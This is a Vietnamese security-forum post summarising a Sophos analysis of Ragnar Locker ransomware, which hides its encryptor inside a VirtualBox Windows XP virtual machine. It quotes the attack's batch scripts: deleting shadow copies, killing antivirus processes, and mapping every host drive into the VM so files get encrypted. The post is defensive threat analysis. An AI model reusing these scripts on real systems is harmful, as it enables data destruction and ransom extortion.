Phân tích kỹ thuật Ransomware Ragnar Locker - Sử dụng máy ảo VirtualBox để mã hóa

Thảo luận trong 'Virus/Malware' bắt đầu bởi HustReMw, 23/05/20, 08:05 PM.

  1. HustReMw

    HustReMw Moderator Thành viên BQT

    Tham gia: 20/12/16, 05:12 PM
    Bài viết: 469
    Đã được thích: 215
    Điểm thành tích:
    43
    Ramgar Locker sử dụng cách mã hóa file mới để né trách các phần mềm diệt virus. Cụ thể, ransomware đã được chạy trong một máy ảo Windows XP -VirtualBox. Bộ đóng gói của ransomware là một file cài đặt msi 122MB gồm 282MB máy ảo và 49KB file mã độc.

    Các hacker đứng sau Ragnar Locker đã từng biết đến trước đó với mục đích tấn công vào các công ty đánh cách dữ liệu để đòi tiền chuộc. Vào tháng 4, các hacker đã tấn công mạng vào công ty Energias của Bồ Đào Nha đánh cắp 10TB dữ liệu nhạy cảm, yêu cầu thanh toán 1.580 bitcoin (khoảng 11 triệu đô) và đe dọa tiết lộ dữ liệu nếu không được trả.

    Trong các cuộc tấn công trước đó, Ragnar Locker tấn công thông qua khai thác lỗ hổng của các dịch vụ hoặc tấn công qua Remote Desktop. Sau khi truy cập được vào quyền quản trị domain, nó đã sử dụng GPO hoặc Powershell để cài đặt và phát tán đến các máy tính khác.

    Trong cuộc tấn công mới được phát hiện này, Ragnar Locker đã sử dụng GPO để thực thi chương trình Windows Installer (msiexec.exe) trên các máy tính, để tải và cài đặt một file MSI 122MB gồm:
    • Một bộ cài phần mềm VirtualBox phiên bản 3.0.4. từ 5/8/2009
    • Một file máy ảo tên micro.vdi – đây là một file máy ảo Windows XP SP3, trong máy ảo chứa ransomware có kích thước 49KB
    • Một chương trình thực thi có tên va.exe
    • Một file install.bat
    • Một số file hỗ trợ khác
    Phần mềm virtualbox và máy ảo được hacker copy vào thư mục C:\Program Files (x86)\VirtualAppliances.

    upload_2020-5-23_20-3-31.png

    Sau khi file msi được tải và thực thi thành công, script install.bat được chạy với các mục đích sau:
    Đăng ký các extension cần thiết (VBoxC.dll and VboxRT.dll,) và driver (VboxDrv.sys) cho VirutualBox

    %binapp%\VBoxSVC.exe /reregserver
    regsvr32 /S “%binpath%\VboxC.dll”
    rundll32 “%binpath%\VBoxRT.dll,RTR3Init”
    sc create VBoxDRV binpath= “%binpath%\drivers\VboxDrv.sys” type= kernel start= auto error= normal displayname= PortableVBoxDRV
    sc start VBoxDRV


    Tắt chức năng thông báo Auto Play của Windows
    sc stop ShellHWDetection

    Xóa shadow trên máy để không thể khôi phục lại các phiên bản trước của file đã bị mã hóa.
    vssadmin delete shadows /all /quiet

    Duyệt tìm các ổ đĩa của máy, ổ đĩa mạng và lưu chúng vào file cấu hình micro.xml để phục vụ cho máy ảo micro.vdi

    mountvol | find “}\” > v.txt
    (For /F %%i In (v.txt) Do (
    Set freedrive=0
    FOR %%d IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
    IF NOT EXIST %%d:\ (
    IF “!freedrive!”==”0” (
    Set freedrive=%%d
    )
    )
    )
    mountvol !freedrive!: %%i
    ping -n 2 127.0.0.1
    ))
    Set driveid=0
    FOR %%d IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
    IF EXIST %%d:\ (
    Set /a driveid+=1
    echo ^<SharedFolder name=”!driveid!” hostPath=”%%d:\” writable=”true”/^> >>sf.txt
    )
    )


    type vm1.txt > micro.xml

    echo ^<CPU count=”1”^> > pn.txt

    type pn.txt >> micro.xml

    type vm2.txt >> micro.xml

    type sf.txt >> micro.xml

    type vm3.txt >> micro.xml


    Máy ảo được cấu hình với 256MB RAM, 1 CPU, 299MB HDD và một network NAT.
    Đến đây, môi trường máy ảo đã chuẩn bị xong, script tìm và kết thúc 50 tiến trình đang chạy trên máy để tất cả các file có thể truy cập được, phục vụ mục đích mã hóa. 50 tiến trình này chủ yếu của các phần mềm dịch vụ, cơ sở dữ liệu, quản lý remote, sao lưu và khôi phục dữ liệu, các service của các phần mềm bảo mật.
    Môi trường máy ảo chuẩn bị thành công, script bắt đầu chạy máy ảo thông qua lệnh
    “%binpath%\VboxHeadless.exe” –startvm micro -v off

    Đưới đây là hình ảnh mô tả quá trình cài đặt của ransomware
    upload_2020-5-23_20-8-1.png

    Các bước thực thi của ransoware được xác định trong quá trình phân tích log:
    1. Thực thi Microsoft Installer (msiexec.exe)
    2. Tải và thực thi gói MSI
    3. Thực thi file bat: cmd.exe /c “C:\Program Files (x86)\VirtualAppliances\install.bat”
    4. Cố gắng tắt tiến trình của AntiVirus: taskkill /IM SavService.exe /F
    5. Cố gắng dừng service của AntiVirus và các tiến trình khác: sc stop mysql
    6. Chia sẻ các ổ đĩa có thể truy cập: mountvol E: \\?\Volume{174f8ec6-d584-11e9-8afa-806e6f6e6963}\
    7. Bắt đầu chạy máy ảo: C:\Program Files (x86)\VirtualAppliances\app64\VBoxHeadless.exe” –startvm micro -v off
    8. Xóa shadow: vssadmin delete shadows /all /quiet

    Phân tích Máy ảo
    Như đã đề cập, máy ảo là một hệ điều ảo Windows XP trong một file micro.vdi. Ransomware trong máy ảo được tìm thấy C:\vrun.exe
    upload_2020-5-23_20-9-10.png

    Để chạy ransomawre, một file bat tên là vrun.bat trong thư mục C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\ sẽ được chạy và gọi ransomware lên. Như chúng ta đã biết, Starrup là một folder chứa các file được chạy khi hệ điều hành khởi động.
    upload_2020-5-23_20-9-28.png

    Dưới đây là các lệnh trong file vrun.bat
    @echo off
    ping -n 11 127.0.0.1
    net use E: \\VBOXSVR\1
    for %%d in (2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33) do (if exist \\VBOXSVR\%%d net use *\\VBOXSVR\%%d)
    :a
    ping -n 3 127.0.0.1
    C:\vrun.exe -vm
    goto a


    Các lệnh này còn mục đích chia sẻ các ổ đĩa để máy ảo có thể truy cập được, danh sách các ổ đĩa này đã có sẵn trong file cấu hình micro.xml được tạo ra trước đó. Như vậy, ransomware được chạy trên máy ảo mà có toàn bộ quyền truy cập các ổ đĩa trên máy thật.
    Ransomware vrun.exe có một số tham số như sau:
    • -backup
    • -list
    • -force
    • -vm
    Cuối cùng, ransomware mã hóa toàn bộ file trên máy tính và thông báo đòi tiền chuộc
    upload_2020-5-23_20-10-34.png

    upload_2020-5-23_20-10-39.png

    Vì ransomware được chạy trong máy ảo, hành vi mã hóa của nó không thể bị can thiệp bởi các phần mềm diệt virus. Toàn bộ các file trên máy thật khi bị hóa hóa sẽ được tính cho tiến trình VboxHeadless.exe của phần mềm hợp pháp VirtualBox
    Nguồn: Sophos
     
    Chỉnh sửa cuối: 23/05/20, 10:05 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    binhbro and DiepNV88 like this.